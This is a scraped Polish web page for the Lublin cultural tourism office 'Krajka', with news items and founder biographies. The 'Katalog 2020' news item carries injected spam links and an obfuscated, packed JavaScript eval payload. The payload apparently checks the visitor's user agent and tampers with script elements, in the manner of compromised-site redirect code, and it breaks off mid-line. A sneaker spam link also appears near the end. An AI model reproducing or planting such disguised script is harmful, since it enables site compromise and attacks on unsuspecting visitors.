NEWSLETTER SLIDE BOX

Bądź na bieżąco z naszą ofertą i zapisz się bezpłatnie na NEWSLETTER.

*

*

(*) Pola obowiązkowe

WYDARZENIA

Brak wydarzeń

CO NOWEGO ?

Dziękujemy za uznanie

13 luty 2018

Jest nam niezmiernie miło, że Krajka została dostrzeżona i nagrodzona z rąk prezydenta miasta honorowym medalem 700-lecia Lublina. Na gali IX Spotkań Turystycznych mieliśmy okazję stanąć w szeregu z wieloletnimi ...

Katalog 2020

05 luty 2020
Katalog 2020

Nowy katalog wycieczek szkolnych 2020. Zapraszamy do zapoznania się z aktualną ofertą Krajki. Do pobrania poniżej: KATALOG 2020 bridge mediaGifts for Runnerseval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8

Lato w mieście 2020

23 czerwiec 2020
Lato w mieście 2020

W ramach akcji LATO W MIEŚCIE 2020 zapraszamy na warsztaty kulinarne do letniej kuchni Krajki:) W czasie zajęć będziemy starali się "zamknąć lato w słoiku". Z ogórków, śliwek, jabłek, malin,...O NAS:

Biuro Turystyki Kulturowej "Krajka" to połączenie naszej turystycznej pasji i doświadczenia w wieloletniej pracy jako piloci i przewodnicy miejscy i terenowi.
Turystyka towarzyszy nam odkąd sięgamy pamięcią... na początku wyprawy w najbliższe okolice, rodzinne przemierzanie szlaków, później już - samotne podróże w "nieznane".
Po wielu latach zdobywania doświadczenia w organizacji wycieczek, pilotażu i usługach przewodnickich po Lubelszczyźnie i Polsce założyłyśmy "Krajkę".
W naszej ofercie znajdą Państwo wiele autorskich programów wycieczek szkolnych, wycieczek dla przedszkolaków, ofert dla grup zorganizowanych, rodzin z dziećmi i turystów indywidualnych.
Każdą wycieczkę i każdą usługę przewodnicką zawsze dostosowujemy do wieku i zainteresowań grupy.
Oprócz tradycyjnych wyjazdów proponujemy również spotkania autorskie, pokazy zapomnianych rzemiosł, wycieczki i warsztaty kulinarne, warsztaty plastyki obrzędowej i wiele, wiele innych... Współpracujemy ze wspaniałymi instruktorami, pilotami i przewodnikami, którzy tak jak my - mają niewątpliwą przyjemność budzić się do pracy z uśmiechem!

Z turystycznym pozdrowieniem
Ewelina Burek & Magdalena Mazur-Ciseł

Ps. Logo Krajki również jest nieprzypadkowe – wzór i kolory nawiązują do tradycji lubelskich wycinanek, a autorem owej wycinanki jest lubelska twórczyni ludowa - Pani Anna Słabczyńska.


Ewelina Burek: absolwentka UMCS - kulturoznawstwo, spec. sztuka i turystyka; aktywny pilot wycieczek, przewodnik terenowy BT Krajka (Lubelszczyzna), przewodnik turystyki aktywnej - spec. turystyka rowerowa, współpracuje z ośrodkami kultury jako animator teatralny, trener questingu;

 W "Krajce" zajmuje się organizacją wycieczek szkolnych, organizacją warsztatów plastyki obrzędowej, usługami przewodnickimi po Kazimierzu Dolnym, Nałęczowie, Puławach i Janowcu oraz organizacją wyjazdów w ramach turystyki okazjonalnej i "Odchodzących zabytków". Ponadto zajmuje się grafiką komputerową: tworzeniem folderów, plakatów itp., obsługą strony internetowej;

O mnie: "Uwielbiam odkrywać nowe tereny, zwłaszcza te zapomniane... ruiny, opuszczone miejsca. Moją drugą pasją jest kultura ludowa, zwłaszcza śpiew tradycyjny. Staram się uczestniczyć we wszelakich warsztatach i spotkaniach, gdzie mogę poznawać zapomniane pieśni Lubelszczyzny. Uwielbiam klimat wspólnego śpiewania... Od paru lat prowadzę warsztaty teatralne dla dzieci i młodzieży (teraz już tylko okazjonalnie) w Końskowoli  i Kazimierzu Dolnym, i również - w tej kwestii - szkolę się i "warsztatuję". W wolnych chwilach gram na bębnach afrykańskich - zwłaszcza na djembe: jej dźwięk urzekł mnie już wiele lat temu...".


Magdalena Mazur-Ciseł: absolwentka UMCS - kulturoznawstwo, spec. sztuka i turystyka; aktywny pilot wycieczek, przewodnik terenowy BT Krajka (Lubelszczyzna), przewodnik miejski po Lublinie, przewodnik turystyki aktywnej - spec. turystyka rowerowa, autorka książki "Legendy Lublina dla dzieci".
W "Krajce" zajmuje się organizacją wycieczek szkolnych, usługami przewodnickimi po Lublinie i Lubelszczyźnie, organizacją wyjazdów i warsztatów w ramach turystyki rodzinnej, turystyką kulinarną w programie "Zasmakuj w Lubelskim" oraz sprawami administracyjno – biurowymi;
  O mnie: "Od dawien dawna moją pasją było i jest odkrywanie nowych miejsc. Tych dalekich i tych, które mam „w zasięgu dłoni"... jednym słowem ciężko mi usiedzieć w miejscu. Idealnym sposobem na poznanie jest dla mnie przede wszystkim aktywność – kajaki, rowery i nade wszystko bieganie! Jeśli jednak tylko poczuję nadchodzącą stabilizację... do swych działań dokładam nowy cel i tak zrodziła się m.in. Krajka, dzięki której moją pasję przekładam na pracę!".
Best SneakersAir Jordan 1 Mid "What The Multi-Color" For Sale

Zapoznaj się z nami bliżej: